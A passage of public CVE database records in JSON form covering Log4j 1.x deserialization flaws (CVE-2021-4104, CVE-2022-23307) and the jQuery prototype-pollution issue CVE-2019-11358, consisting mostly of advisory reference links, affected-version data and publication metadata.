"GLSA-202310-16", tags: [ "vendor-advisory", ], url: "https://security.gentoo.org/glsa/202310-16", }, { name: "GLSA-202312-02", tags: [ "vendor-advisory", ], url: "https://security.gentoo.org/glsa/202312-02", }, { name: "GLSA-202312-04", tags: [ "vendor-advisory", ], url: "https://security.gentoo.org/glsa/202312-04", }, ], source: { discovery: "UNKNOWN", }, title: "Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2", x_generator: { engine: "Vulnogram 0.0.9", }, }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2021-4104", datePublished: "2021-12-14T00:00:00", dateReserved: "2021-12-13T00:00:00", dateUpdated: "2024-08-03T17:16:04.172Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2019-11358
Vulnerability from cvelistv5
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T22:48:09.199Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://www.drupal.org/sa-core-2019-006", }, { tags: [ "x_transferred", ], url: "https://www.synology.com/security/advisory/Synology_SA_19_19", }, { name: "DSA-4434", tags: [ "vendor-advisory", "x_transferred", ], url: "https://www.debian.org/security/2019/dsa-4434", }, { name: "20190421 [SECURITY] [DSA 4434-1] drupal7 security update", tags: [ "mailing-list", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/Apr/32", }, { name: "108023", tags: [ "vdb-entry", "x_transferred", ], url: "http://www.securityfocus.com/bid/108023", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] feng-tao commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] feng-tao opened a new pull request #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] codecov-io commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] XD-DENG merged pull request #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E", }, { 
name: "[airflow-commits] 20190428 [GitHub] [airflow] XD-DENG commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E", }, { name: "[debian-lts-announce] 20190506 [SECURITY] [DLA 1777-1] jquery security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html", }, { name: "FEDORA-2019-eba8e44ee6", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI/", }, { name: "FEDORA-2019-1a3edd7e8a", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/", }, { name: "FEDORA-2019-7eaf0bbe7c", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO/", }, { name: "FEDORA-2019-2a0ce0c58c", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F/", }, { name: "FEDORA-2019-a06dffab1c", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP/", }, { name: "FEDORA-2019-f563e66380", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5/", }, { name: "20190509 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/May/18", 
}, { tags: [ "x_transferred", ], url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { name: "20190510 dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", "x_transferred", ], url: "http://seclists.org/fulldisclosure/2019/May/11", }, { name: "20190510 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", "x_transferred", ], url: "http://seclists.org/fulldisclosure/2019/May/10", }, { name: "20190510 Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", "x_transferred", ], url: "http://seclists.org/fulldisclosure/2019/May/13", }, { name: "[debian-lts-announce] 20190520 [SECURITY] [DLA 1797-1] drupal7 security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html", }, { name: "[oss-security] 20190603 Django: CVE-2019-12308 AdminURLFieldWidget XSS (plus patched bundled jQuery for CVE-2019-11358)", tags: [ "mailing-list", "x_transferred", ], url: "http://www.openwall.com/lists/oss-security/2019/06/03/2", }, { tags: [ "x_transferred", ], url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { name: "RHSA-2019:1456", tags: [ "vendor-advisory", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1456", }, { name: "DSA-4460", tags: [ "vendor-advisory", "x_transferred", ], url: "https://www.debian.org/security/2019/dsa-4460", }, { name: "20190612 [SECURITY] [DSA 4460-1] mediawiki security update", tags: [ "mailing-list", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/Jun/12", }, { name: "openSUSE-SU-2019:1839", tags: [ "vendor-advisory", "x_transferred", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html", }, { name: "RHBA-2019:1570", tags: [ "vendor-advisory", "x_transferred", ], url: "https://access.redhat.com/errata/RHBA-2019:1570", }, { name: "openSUSE-SU-2019:1872", tags: [ "vendor-advisory", 
"x_transferred", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html", }, { name: "[roller-commits] 20190820 [jira] [Created] (ROL-2150) Fix Js security vulnerabilities detected using retire js", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { name: "RHSA-2019:2587", tags: [ "vendor-advisory", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:2587", }, { tags: [ "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20190919-0001/", }, { name: "RHSA-2019:3023", tags: [ "vendor-advisory", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3023", }, { name: "RHSA-2019:3024", tags: [ "vendor-advisory", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3024", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "[nifi-commits] 20191113 svn commit: r1869773 - /nifi/site/trunk/security.html", tags: [ "mailing-list", "x_transferred", ], url: 
"https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.tenable.com/security/tns-2019-08", }, { name: "[nifi-commits] 20200123 svn commit: r1873083 - /nifi/site/trunk/security.html", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E", }, { name: "[debian-lts-announce] 20200224 [SECURITY] [DLA 2118-1] otrs2 security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html", }, { tags: [ "x_transferred", ], url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { tags: [ "x_transferred", ], url: "https://www.tenable.com/security/tns-2020-02", }, { name: "[syncope-dev] 20200423 Jquery version on 2.1.x/2.0.x", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E", }, { name: "[flink-dev] 20200513 [jira] [Created] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E", }, { name: "[flink-issues] 20200513 [jira] [Created] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200518 [jira] [Commented] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E", }, { 
name: "[flink-issues] 20200518 [jira] [Updated] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200518 [jira] [Assigned] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200520 [jira] [Closed] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[storm-dev] 20200708 [GitHub] [storm] Crim opened a new pull request #3305: [STORM-3553] Upgrade jQuery from 1.11.1 to 3.5.1", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_transferred", ], url: "https://backdropcms.org/security/backdrop-sa-core-2019-009", }, { tags: [ "x_transferred", ], url: "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/", }, { tags: [ "x_transferred", ], url: "https://snyk.io/vuln/SNYK-JS-JQUERY-174006", }, { tags: [ "x_transferred", ], 
url: "https://github.com/jquery/jquery/pull/4333", }, { tags: [ "x_transferred", ], url: "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b", }, { tags: [ "x_transferred", ], url: "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery/", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_transferred", ], url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { tags: [ "x_transferred", ], url: "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1", }, { name: "[debian-lts-announce] 20230831 [SECURITY] [DLA 3551-1] otrs2 security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2019-11358", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-02-20T15:03:16.892088Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-11-15T15:11:23.024Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], descriptions: [ { lang: "en", 
value: "jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2023-08-31T02:06:52.187292", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { url: "https://www.drupal.org/sa-core-2019-006", }, { url: "https://www.synology.com/security/advisory/Synology_SA_19_19", }, { name: "DSA-4434", tags: [ "vendor-advisory", ], url: "https://www.debian.org/security/2019/dsa-4434", }, { name: "20190421 [SECURITY] [DSA 4434-1] drupal7 security update", tags: [ "mailing-list", ], url: "https://seclists.org/bugtraq/2019/Apr/32", }, { name: "108023", tags: [ "vdb-entry", ], url: "http://www.securityfocus.com/bid/108023", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] feng-tao commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] feng-tao opened a new pull request #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] codecov-io commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] XD-DENG merged pull request #5197: [AIRFLOW-XXX] Fix 
CVE-2019-11358", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] XD-DENG commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E", }, { name: "[debian-lts-announce] 20190506 [SECURITY] [DLA 1777-1] jquery security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html", }, { name: "FEDORA-2019-eba8e44ee6", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI/", }, { name: "FEDORA-2019-1a3edd7e8a", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/", }, { name: "FEDORA-2019-7eaf0bbe7c", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO/", }, { name: "FEDORA-2019-2a0ce0c58c", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F/", }, { name: "FEDORA-2019-a06dffab1c", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP/", }, { name: "FEDORA-2019-f563e66380", tags: [ "vendor-advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5/", }, { name: "20190509 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", ], url: 
"https://seclists.org/bugtraq/2019/May/18", }, { url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { name: "20190510 dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", ], url: "http://seclists.org/fulldisclosure/2019/May/11", }, { name: "20190510 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", ], url: "http://seclists.org/fulldisclosure/2019/May/10", }, { name: "20190510 Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", ], url: "http://seclists.org/fulldisclosure/2019/May/13", }, { name: "[debian-lts-announce] 20190520 [SECURITY] [DLA 1797-1] drupal7 security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html", }, { name: "[oss-security] 20190603 Django: CVE-2019-12308 AdminURLFieldWidget XSS (plus patched bundled jQuery for CVE-2019-11358)", tags: [ "mailing-list", ], url: "http://www.openwall.com/lists/oss-security/2019/06/03/2", }, { url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { name: "RHSA-2019:1456", tags: [ "vendor-advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1456", }, { name: "DSA-4460", tags: [ "vendor-advisory", ], url: "https://www.debian.org/security/2019/dsa-4460", }, { name: "20190612 [SECURITY] [DSA 4460-1] mediawiki security update", tags: [ "mailing-list", ], url: "https://seclists.org/bugtraq/2019/Jun/12", }, { name: "openSUSE-SU-2019:1839", tags: [ "vendor-advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html", }, { name: "RHBA-2019:1570", tags: [ "vendor-advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:1570", }, { name: "openSUSE-SU-2019:1872", tags: [ "vendor-advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html", }, { name: "[roller-commits] 20190820 [jira] [Created] (ROL-2150) Fix Js security vulnerabilities detected 
using retire js", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { name: "RHSA-2019:2587", tags: [ "vendor-advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2587", }, { url: "https://security.netapp.com/advisory/ntap-20190919-0001/", }, { name: "RHSA-2019:3023", tags: [ "vendor-advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3023", }, { name: "RHSA-2019:3024", tags: [ "vendor-advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3024", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "[nifi-commits] 20191113 svn commit: r1869773 - /nifi/site/trunk/security.html", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E", }, { url: "https://www.tenable.com/security/tns-2019-08", }, { name: "[nifi-commits] 20200123 svn commit: r1873083 - /nifi/site/trunk/security.html", tags: [ "mailing-list", ], url: 
"https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E", }, { name: "[debian-lts-announce] 20200224 [SECURITY] [DLA 2118-1] otrs2 security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html", }, { url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { url: "https://www.tenable.com/security/tns-2020-02", }, { name: "[syncope-dev] 20200423 Jquery version on 2.1.x/2.0.x", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E", }, { name: "[flink-dev] 20200513 [jira] [Created] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E", }, { name: "[flink-issues] 20200513 [jira] [Created] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200518 [jira] [Commented] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200518 [jira] [Updated] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200518 [jira] [Assigned] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", ], url: 
"https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E", }, { name: "[flink-issues] 20200520 [jira] [Closed] (FLINK-17675) Resolve CVE-2019-11358 from jquery", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E", }, { url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[storm-dev] 20200708 [GitHub] [storm] Crim opened a new pull request #3305: [STORM-3553] Upgrade jQuery from 1.11.1 to 3.5.1", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E", }, { url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { url: "https://backdropcms.org/security/backdrop-sa-core-2019-009", }, { url: "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/", }, { url: "https://snyk.io/vuln/SNYK-JS-JQUERY-174006", }, { url: "https://github.com/jquery/jquery/pull/4333", }, { url: "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b", }, { url: "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery/", }, { url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { url: 
"https://www.oracle.com/security-alerts/cpujan2022.html", }, { url: "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1", }, { name: "[debian-lts-announce] 20230831 [SECURITY] [DLA 3551-1] otrs2 security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, ], }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2019-11358", datePublished: "2019-04-19T00:00:00", dateReserved: "2019-04-19T00:00:00", dateUpdated: "2024-11-15T15:11:23.024Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2022-23307
Vulnerability from cvelistv5
| URL | Tags |
|---|---|
| https://logging.apache.org/log4j/1.2/index.html | x_refsource_MISC |
| https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh | x_refsource_MISC |
| https://www.oracle.com/security-alerts/cpuapr2022.html | x_refsource_MISC |
| https://www.oracle.com/security-alerts/cpujul2022.html | x_refsource_MISC |
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Log4j 1.x | Version: 1.2.1 < unspecified; Version: unspecified ≤ 2.0-alpha1 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-03T03:36:20.396Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://lists.apache.org/thread/rg4yyc89vs3dw6kpy3r92xop9loywyhh", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache Log4j 1.x", vendor: "Apache Software Foundation", versions: [ { lessThan: "unspecified", status: "affected", version: "1.2.1", versionType: "custom", }, { lessThanOrEqual: "2.0-alpha1", status: "affected", version: "unspecified", versionType: "custom", }, ], }, ], credits: [ { lang: "en", value: "@kingkk", }, ], descriptions: [ { lang: "en", value: "CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. 
